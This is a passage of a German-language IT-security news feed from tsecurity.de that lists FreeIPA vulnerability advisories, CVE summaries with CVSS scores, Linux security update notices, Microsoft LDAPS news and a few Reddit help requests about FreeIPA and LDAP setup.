<title><![CDATA[Ausführen beliebiger Kommandos in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1076554/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1076554/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-freeipa-fedora/</guid>
<pubDate>Sun, 05 Apr 2020 17:15:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Zwei Probleme in freeipa (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1072077/it-security-nachrichten/zwei-probleme-in-freeipa-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1072077/it-security-nachrichten/zwei-probleme-in-freeipa-red-hat/</guid>
<pubDate>Wed, 01 Apr 2020 13:17:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Microsoft stellt Domaincontroller langsam auf LDAPS um]]></title>
<description><![CDATA[Mit einem Update, das später im Jahr für alle unterstützen Versionen von Windows Server erscheinen wird, leitet Microsoft langsam das Ende von ...]]></description>
<link>https://tsecurity.de/de/1031370/windows-server/microsoft-stellt-domaincontroller-langsam-auf-ldaps-um/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1031370/windows-server/microsoft-stellt-domaincontroller-langsam-auf-ldaps-um/</guid>
<pubDate>Sun, 23 Feb 2020 02:18:06 +0100</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit einem Update, das später im Jahr für alle unterstützen Versionen von <b>Windows Server</b> erscheinen wird, leitet Microsoft langsam das Ende von ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft stellt Domaincontroller langsam auf LDAPS um]]></title>
<description><![CDATA[Microsoft bereitet eine Umstellung auf LDAPS im Active Directory vor. Admins sollten rechtzeitig Einstellungen und Logs prüfen, um Ausfälle zu vermeiden.]]></description>
<link>https://tsecurity.de/de/1030985/it-nachrichten/microsoft-stellt-domaincontroller-langsam-auf-ldaps-um/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1030985/it-nachrichten/microsoft-stellt-domaincontroller-langsam-auf-ldaps-um/</guid>
<pubDate>Sat, 22 Feb 2020 10:47:30 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft bereitet eine Umstellung auf LDAPS im Active Directory vor. Admins sollten rechtzeitig Einstellungen und Logs prüfen, um Ausfälle zu vermeiden.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft stellt Domaincontroller langsam auf LDAPS um]]></title>
<description><![CDATA[Microsoft bereitet eine Umstellung auf LDAPS im Active Directory vor. Admins sollten rechtzeitig Einstellungen und Logs prüfen, um Ausfälle zu vermeiden.]]></description>
<link>https://tsecurity.de/de/1030975/it-security-nachrichten/microsoft-stellt-domaincontroller-langsam-auf-ldaps-um/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1030975/it-security-nachrichten/microsoft-stellt-domaincontroller-langsam-auf-ldaps-um/</guid>
<pubDate>Sat, 22 Feb 2020 10:46:29 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft bereitet eine Umstellung auf LDAPS im Active Directory vor. Admins sollten rechtzeitig Einstellungen und Logs prüfen, um Ausfälle zu vermeiden.]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 4.2.0 Password Hash information disclosure]]></title>
<description><![CDATA[A vulnerability has been found in FreeIPA 4.2.0 (Directory Service Software) and classified as problematic. This vulnerability affects some unknown functionality of the component Password Hash. There is no information about possible countermeasures known. It may be suggested to replace the affect...]]></description>
<link>https://tsecurity.de/de/974300/sicherheitsluecken/freeipa-420-password-hash-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/974300/sicherheitsluecken/freeipa-420-password-hash-information-disclosure/</guid>
<pubDate>Sun, 22 Dec 2019 08:46:14 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.freeipa">FreeIPA 4.2.0</a> (Directory Service Software) and classified as problematic. This vulnerability affects some unknown functionality of the component <em>Password Hash</em>. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Arch Linux (firefox), Fedora (cyrus-imapd, freeipa, haproxy, ImageMagick, python-pillow, rubygem-rmagick, sqlite, squid, and tnef), openSUSE (haproxy), Oracle (microcode_ctl), and Ubuntu (squid, squid3).]]></description>
<link>https://tsecurity.de/de/939005/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/939005/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 05 Dec 2019 16:00:15 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Arch Linux</b> (firefox), <b>Fedora</b> (cyrus-imapd, freeipa, haproxy, ImageMagick, python-pillow, rubygem-rmagick, sqlite, squid, and tnef), <b>openSUSE</b> (haproxy), <b>Oracle</b> (microcode_ctl), and <b>Ubuntu</b> (squid, squid3).]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/938461/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/938461/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</guid>
<pubDate>Thu, 05 Dec 2019 07:16:33 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Zwei Probleme in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/938462/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/938462/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</guid>
<pubDate>Thu, 05 Dec 2019 07:16:33 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[FreeIPA 4.x API Lockout privilege escalation]]></title>
<description><![CDATA[A vulnerability was found in FreeIPA 4.x (Directory Service Software). It has been classified as critical. Affected is an unknown code block of the component API. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative p...]]></description>
<link>https://tsecurity.de/de/923046/sicherheitsluecken/freeipa-4x-api-lockout-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/923046/sicherheitsluecken/freeipa-4x-api-lockout-privilege-escalation/</guid>
<pubDate>Wed, 20 Nov 2019 09:32:10 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.freeipa">FreeIPA 4.x</a> (Directory Service Software). It has been classified as critical. Affected is an unknown code block of the component <em>API</em>. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA up to 4.2.1 ipa-kra-install kra-agent.pem information disclosure]]></title>
<description><![CDATA[A vulnerability was found in FreeIPA up to 4.2.1 (Directory Service Software). It has been rated as problematic. This issue affects an unknown functionality of the file /etc/httpd/alias/kra-agent.pem of the component ipa-kra-install. Upgrading to version 4.2.2 eliminates this vulnerability.]]></description>
<link>https://tsecurity.de/de/920578/sicherheitsluecken/freeipa-up-to-421-ipa-kra-install-kra-agentpem-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/920578/sicherheitsluecken/freeipa-up-to-421-ipa-kra-install-kra-agentpem-information-disclosure/</guid>
<pubDate>Mon, 18 Nov 2019 11:02:39 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.freeipa">FreeIPA up to 4.2.1</a> (Directory Service Software). It has been rated as problematic. This issue affects an unknown functionality of the file <em>/etc/httpd/alias/kra-agent.pem</em> of the component <em>ipa-kra-install</em>. Upgrading to version 4.2.2 eliminates this vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA Non-Printable Characters unknown vulnerability [CVE-2015-5179]]]></title>
<description><![CDATA[A vulnerability has been found in FreeIPA (Directory Service Software) (the affected version is unknown) and classified as critical. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></description>
<link>https://tsecurity.de/de/920204/sicherheitsluecken/freeipa-non-printable-characters-unknown-vulnerability-cve-2015-5179/</link>
<guid isPermaLink="true">https://tsecurity.de/de/920204/sicherheitsluecken/freeipa-non-printable-characters-unknown-vulnerability-cve-2015-5179/</guid>
<pubDate>Sun, 17 Nov 2019 21:31:34 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.freeipa">FreeIPA</a> (Directory Service Software) (<a href="https://vuldb.com/?doc.version">the affected version is unknown</a>) and classified as critical. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA Default Password Policy Lockout denial of service]]></title>
<description><![CDATA[A vulnerability has been found in FreeIPA (Directory Service Software) (the affected version is unknown) and classified as problematic. This vulnerability affects an unknown part of the component Default Password Policy. Upgrading eliminates this vulnerability. A possible mitigation has been publ...]]></description>
<link>https://tsecurity.de/de/913249/sicherheitsluecken/freeipa-default-password-policy-lockout-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/913249/sicherheitsluecken/freeipa-default-password-policy-lockout-denial-of-service/</guid>
<pubDate>Sun, 10 Nov 2019 19:46:36 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.freeipa">FreeIPA</a> (Directory Service Software) (<a href="https://vuldb.com/?doc.version">the affected version is unknown</a>) and classified as problematic. This vulnerability affects an unknown part of the component <em>Default Password Policy</em>. Upgrading eliminates this vulnerability. A possible mitigation has been published even before and not after the disclosure of the vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 4.4.0 SAN Name information disclosure]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in FreeIPA 4.4.0 (Directory Service Software). This affects an unknown code of the component SAN Name Handler. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an a...]]></description>
<link>https://tsecurity.de/de/896401/sicherheitsluecken/freeipa-440-san-name-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/896401/sicherheitsluecken/freeipa-440-san-name-information-disclosure/</guid>
<pubDate>Sun, 20 Oct 2019 19:32:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as problematic, was found in <a href="https://vuldb.com/?product.freeipa">FreeIPA 4.4.0</a> (Directory Service Software). This affects an unknown code of the component <em>SAN Name Handler</em>. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></content:encoded>
</item>
<item>
<title><![CDATA[Red Hat FreeIPA 0.99/1.0.0/1.1.0 Default Configuration information disclosure]]></title>
<description><![CDATA[A vulnerability was found in Red Hat FreeIPA 0.99/1.0.0/1.1.0 (Directory Service Software). It has been rated as problematic. Affected by this issue is some unknown functionality of the component Default Configuration. Upgrading to version 1.1.0 eliminates this vulnerability. A possible mitigatio...]]></description>
<link>https://tsecurity.de/de/582769/sicherheitsluecken/red-hat-freeipa-099100110-default-configuration-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/582769/sicherheitsluecken/red-hat-freeipa-099100110-default-configuration-information-disclosure/</guid>
<pubDate>Sat, 17 Aug 2019 12:39:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.red_hat:freeipa">Red Hat FreeIPA 0.99/1.0.0/1.1.0</a> (Directory Service Software). It has been rated as problematic. Affected by this issue is some unknown functionality of the component <em>Default Configuration</em>. Upgrading to version 1.1.0 eliminates this vulnerability. A possible mitigation has been published immediately after the disclosure of the vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zoho ManageEngine OpManager 12.3 Cross Site Scripting]]></title>
<description><![CDATA[Zoho ManageEngine OpManager version 12.3 prior to build 123237 has a cross site scripting vulnerability in the domainController API.]]></description>
<link>https://tsecurity.de/de/426413/poc/zoho-manageengine-opmanager-123-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/426413/poc/zoho-manageengine-opmanager-123-cross-site-scripting/</guid>
<pubDate>Tue, 11 Dec 2018 19:24:05 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zoho ManageEngine OpManager version 12.3 prior to build 123237 has a cross site scripting vulnerability in the domainController API.]]></content:encoded>
</item>
<item>
<title><![CDATA[Problem with connection to LDAP repo]]></title>
<description><![CDATA[I have 2 servers one is FREEIPA (LDAP) and server1. When i try to install from LDAP repo (yum install group install "Directory Client") i cant here is the problem (please help) Server1 (config) https://imgur.com/a/U0rfrxH When i ping LDAP server ip it is ok... and its own  LDAP server (config) ht...]]></description>
<link>https://tsecurity.de/de/394540/linux-tipps/problem-with-connection-to-ldap-repo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/394540/linux-tipps/problem-with-connection-to-ldap-repo/</guid>
<pubDate>Wed, 24 Oct 2018 09:00:18 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<h1>I have 2 servers one is FREEIPA (LDAP) and server1.</h1> <p>When i try to install from LDAP repo (yum install group install "Directory Client") i cant here is the problem (please help)</p> <p>Server1 (config)</p> <p><a href="https://imgur.com/a/U0rfrxH">https://imgur.com/a/U0rfrxH</a></p> <p>When i ping LDAP server ip it is ok... and its own </p> <p>LDAP server (config)</p> <p><a href="https://imgur.com/a/38Ia2Pk">https://imgur.com/a/38Ia2Pk</a></p> <p>​</p> <p>Where is the problem i how i can solve this (all servers are on KVM/QEMU)</p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/vei_1"> /u/vei_1 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/9qx9of/problem_with_connection_to_ldap_repo/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/9qx9of/problem_with_connection_to_ldap_repo/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[looking to follow proper practices with certificates, FreeIPA, and sophos xg]]></title>
<description><![CDATA[Hello, I've been learning a great deal more about CentOS and RHEL the past few weeks to help improve my linux game. I went through the install processes following these guides a few times to learn. But, I'm also being a bit more particular on some levels such as HDD partitions. I probably won't r...]]></description>
<link>https://tsecurity.de/de/374881/it-security-nachrichten/looking-to-follow-proper-practices-with-certificates-freeipa-and-sophos-xg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/374881/it-security-nachrichten/looking-to-follow-proper-practices-with-certificates-freeipa-and-sophos-xg/</guid>
<pubDate>Tue, 18 Sep 2018 17:15:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>Hello, I've been learning a great deal more about CentOS and RHEL the past few weeks to help improve my linux game.</p> <p>I went through the install processes following these <a href="https://github.com/rharmonson/richtech/wiki">guides</a> a few times to learn. But, I'm also being a bit more particular on some levels such as HDD partitions. I probably won't remove firewalld from all the installs.</p> <p>But, the configuration I'm doing will add quite a bit to it as I'll be integrating this with Sophos XG. I'm not a security expert I'm primarily here looking for a book on proper handling of certificates and the correlative integration with Sophos.</p> <p>Would I be making most of the certificates from the root CA server or FreeIPA server? For Sophos SSL inspection for example how would you handle this certificates creation and implementation?</p> <p>I may buy my own wildcard certificate, but in the mean time I only have a single web domain cert paid for. So, I'd like to consider making this relatively "simple" to change into a wildcard if I do install it. Otherwise, what may be the "best" practices of naming the internal servers? I remember reading about someone who did 4 dotted fqdn like <a href="https://blank.blank.tech.com/">blank.blank.tech.com</a>...</p> <p>I'm not interested in using Let'sEncrypt, with how Norton is being removed from the internet for being caught handing their cert out to relatively non-trustworthy people. I'd like to wonder how in the heck we are supposed to trust the one that can be given to anyone inherently. Likewise I'm not a security professional by any means.</p> <p>​</p> <p>Any other hints or tips you'd recommend?</p> <p>​</p> <p>I will have vms of Alienvault OSSIM setup and probably Security Onion for it's log management</p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/uberbewb"> /u/uberbewb </a> <br><span><a href="https://www.reddit.com/r/security/comments/9gvoek/looking_to_follow_proper_practices_with/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/9gvoek/looking_to_follow_proper_practices_with/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Onlinetraining: Fitnesstracker Strava verrät Lage von Militärstützpunkten]]></title>
<description><![CDATA[Strava ist der Hersteller einer Fitnesstracking-App, die via GPS von Smartphones verfolgt, wann und wo ein Benutzer trainiert. Ziel ist eine Art soziales Netzwerk für Sportler. Damit können jedoch auch militärische Geheimnisse verraten werden. (Security, Internet)]]></description>
<link>https://tsecurity.de/de/260221/it-nachrichten/onlinetraining-fitnesstracker-strava-verraet-lage-von-militaerstuetzpunkten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/260221/it-nachrichten/onlinetraining-fitnesstracker-strava-verraet-lage-von-militaerstuetzpunkten/</guid>
<pubDate>Mon, 29 Jan 2018 09:21:22 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Strava ist der Hersteller einer Fitnesstracking-App, die via GPS von Smartphones verfolgt, wann und wo ein Benutzer trainiert. Ziel ist eine Art soziales Netzwerk für Sportler. Damit können jedoch auch militärische Geheimnisse verraten werden. (<a href="https://www.golem.de/specials/security/">Security</a>, <a href="https://www.golem.de/specials/internet/">Internet</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=132434&amp;page=1&amp;ts=1517211300" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Onlinetraining: Fitnesstracker Strava verrät Lage von Militärstützpunkten]]></title>
<description><![CDATA[Strava ist der Hersteller einer Fitnesstracking-App, die via GPS von Smartphones verfolgt, wann und wo ein Benutzer trainiert. Ziel ist eine Art soziales Netzwerk für Sportler. Damit können jedoch auch militärische Geheimnisse verraten werden. (Security, Internet)]]></description>
<link>https://tsecurity.de/de/260214/it-security-nachrichten/onlinetraining-fitnesstracker-strava-verraet-lage-von-militaerstuetzpunkten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/260214/it-security-nachrichten/onlinetraining-fitnesstracker-strava-verraet-lage-von-militaerstuetzpunkten/</guid>
<pubDate>Mon, 29 Jan 2018 09:17:48 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Strava ist der Hersteller einer Fitnesstracking-App, die via GPS von Smartphones verfolgt, wann und wo ein Benutzer trainiert. Ziel ist eine Art soziales Netzwerk für Sportler. Damit können jedoch auch militärische Geheimnisse verraten werden. (<a href="https://www.golem.de/specials/security/">Security</a>, <a href="https://www.golem.de/specials/internet/">Internet</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=132434&amp;page=1&amp;ts=1517211300" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 4.2.0 Password Hash Information Disclosure]]></title>
<description><![CDATA[In FreeIPA 4.2.0 wurde eine problematische Schwachstelle gefunden. Hierbei betrifft es eine unbekannte Funktion der Komponente Password Hash. Dank der Manipulation mit einer unbekannten Eingabe kann eine Information Disclosure-Schwachstelle ausgenutzt werden. CWE definiert das Problem als CWE-200...]]></description>
<link>https://tsecurity.de/de/252554/sicherheitsluecken/freeipa-420-password-hash-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/252554/sicherheitsluecken/freeipa-420-password-hash-information-disclosure/</guid>
<pubDate>Thu, 11 Jan 2018 16:50:55 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In FreeIPA 4.2.0 wurde eine problematische Schwachstelle gefunden. Hierbei betrifft es eine unbekannte Funktion der Komponente <em>Password Hash</em>. Dank der Manipulation mit einer unbekannten Eingabe kann eine Information Disclosure-Schwachstelle ausgenutzt werden. CWE definiert das Problem als <a href="https://cwe.mitre.org/data/definitions/200.html">CWE-200</a>. Auswirkungen sind zu beobachten für  die Vertraulichkeit. </p><p>Die Schwachstelle wurde am 10.01.2018 als <em>Bug 1487697</em> in Form eines Bug Reports (Bugzilla) an die Öffentlichkeit getragen. Auf <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1487697">bugzilla.redhat.com</a> kann das Advisory eingesehen werden. Eine eindeutige Identifikation der Schwachstelle wird seit dem 01.08.2017 mit <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12169">CVE-2017-12169</a> vorgenommen. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Das Angehen einer einfachen Authentisierung ist erforderlich, um eine Ausnutzung anzugehen. Nicht vorhanden sind sowohl technische Details als auch ein Exploit zur Schwachstelle. Als Preis für einen Exploit ist zur Zeit ungefähr mit USD $0-$5k zu rechnen (<a href="https://vuldb.com/?doc.exploitprices">Preisberechnung vom 01/11/2018</a>). </p><p></p><p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p><p></p><h2>CVSSv3</h2><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/specification-document#i2">4.3</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/specification-document#i3">4.3</a><br><span>VulDB Vector</span>: <a href="https://www.first.org/cvss/specification-document#i6">CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:X/RL:X/RC:X</a><br><span>VulDB Zuverlässigkeit</span>: High<br><h2>CVSSv2</h2><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.1">3.5 (CVSS2#AV:N/AC:M/Au:S/C:P/I:N/A:N)</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/v2/guide#i2.2">3.5 (CVSS2#E:ND/RL:ND/RC:ND)</a><br><span>VulDB Zuverlässigkeit</span>: High<br><br><h2>CPE</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/search-results?cpe=cpe%3A%2Fa%3Afreeipa%3Afreeipa%3A4.2.0&amp;page_num=0&amp;cid=3">cpe:/a:freeipa:freeipa:4.2.0</a></li></ul><h2>Exploiting</h2><span>Klasse</span>: Information Disclosure (<a href="https://cwe.mitre.org/data/definitions/200.html">CWE-200</a>)<br><span>Lokal</span>: Nein<br><span>Remote</span>: Ja<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Preisentwicklung</span>: gleichbleibend<br><span>Aktuelle Preisschätzung</span>: <span>$0-$5k (0-day) / $0-$5k (Heute)</span><br><br><h2>Gegenmassnahmen</h2><span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: 0 Tage seit gefunden<br><h2>Timeline</h2><span>01.08.2017</span>  <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12169">CVE zugewiesen</a><br><span>10.01.2018</span>  <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1487697">Advisory veröffentlicht</a><br><span>11.01.2018</span>  <a href="https://vuldb.com///vuldb.com/?id.111694">VulDB Eintrag erstellt</a><br><span>11.01.2018</span>  <a href="https://vuldb.com///vuldb.com/?id.111694">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2><span>Advisory</span>: <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1487697">Bug 1487697</a><br><br><span>CVE</span>: CVE-2017-12169 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12169">(mitre.org)</a> <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-12169">(nvd.nist.org)</a> <a href="https://www.cvedetails.com/cve/CVE-2017-12169/">(cvedetails.com)</a><br><h2>Eintrag</h2><span>Erstellt</span>: 11.01.2018<br><span>Eintrag</span>: 70.8% komplett<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[ALT Linux 8.2 Distro Released with Workstation, Server, and Education Editions]]></title>
<description><![CDATA[Michael Shigorin of BaseALT Ltd announced the release and general availability for download of the ALT Linux 8.2 computer operating system for desktops, servers, and educational organizations.

Available for both 32-bit and 64-bit installations, ALT Linux 8.2 is here with critical security fixes ...]]></description>
<link>https://tsecurity.de/de/247822/it-security-nachrichten/alt-linux-82-distro-released-with-workstation-server-and-education-editions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/247822/it-security-nachrichten/alt-linux-82-distro-released-with-workstation-server-and-education-editions/</guid>
<pubDate>Sun, 31 Dec 2017 15:45:20 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Michael Shigorin of BaseALT Ltd announced the release and general availability for download of the ALT Linux 8.2 computer operating system for desktops, servers, and educational organizations.

Available for both 32-bit and 64-bit installations, ALT Linux 8.2 is here with critical security fixes for various of its core components, including the Linux kernel, OpenSSL, Samba, and other, along with various bug fixes and improvements.

"BaseALT Ltd announces the release of ALT Server, ALT Workstation and ALT Education distributions version 8.2, aimed for corporate servers and desktops, educational and personal use," reads the release announcement.

Here's what's new in ALT Linux 8.2

ALT Linux 8.2 now uses iucode-tool to load updated processor microcode on all editions. For desktops, ALT Workstation 8.2 comes bundled with the FreeIPA client and the Chromium web brows...]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2017-12169 Information Disclosure Vulnerability]]></title>
<description><![CDATA[FreeIPA CVE-2017-12169 Information Disclosure Vulnerability]]></description>
<link>https://tsecurity.de/de/240453/sicherheitsluecken/vuln-freeipa-cve-2017-12169-information-disclosure-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/240453/sicherheitsluecken/vuln-freeipa-cve-2017-12169-information-disclosure-vulnerability/</guid>
<pubDate>Tue, 12 Dec 2017 18:51:30 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2017-12169 Information Disclosure Vulnerability]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 4.x API Lockout erweiterte Rechte]]></title>
<description><![CDATA[Es wurde eine kritische Schwachstelle in FreeIPA 4.x ausgemacht. Hiervon betroffen ist eine unbekannte Funktion der Komponente API. Dank Manipulation mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle (Lockout) ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung a...]]></description>
<link>https://tsecurity.de/de/210051/sicherheitsluecken/freeipa-4x-api-lockout-erweiterte-rechte/</link>
<guid isPermaLink="true">https://tsecurity.de/de/210051/sicherheitsluecken/freeipa-4x-api-lockout-erweiterte-rechte/</guid>
<pubDate>Thu, 28 Sep 2017 10:50:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Es wurde eine kritische Schwachstelle in FreeIPA 4.x ausgemacht. Hiervon betroffen ist eine unbekannte Funktion der Komponente <em>API</em>. Dank Manipulation mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle (Lockout) ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als <a href="https://cwe.mitre.org/data/definitions/269.html">CWE-269</a> vorgenommen. Mit Auswirkungen muss man rechnen für Vertraulichkeit, Integrität und Verfügbarkeit. CVE fasst zusammen:<br></p><blockquote lang="en">FreeIPA 4.x with API version 2.213 allows a remote authenticated users to bypass intended account-locking restrictions via an unlock action with an old session ID (for the same user account) that had been created for an earlier session.</blockquote><p>Die Schwachstelle wurde am 28.09.2017 publik gemacht. Die Verwundbarkeit wird seit dem 12.07.2017 unter <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11191">CVE-2017-11191</a> geführt. Es sind weder technische Details noch ein Exploit zur Schwachstelle bekannt. Es muss davon ausgegangen werden, dass ein Exploit zur Zeit etwa USD $0-$5k kostet (<a href="https://vuldb.com/?doc.exploitprices">Preisberechnung vom 09/28/2017</a>). </p><p></p><p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p><p></p><h2>CVSSv3</h2><span>VulDB Base Score</span>: <a 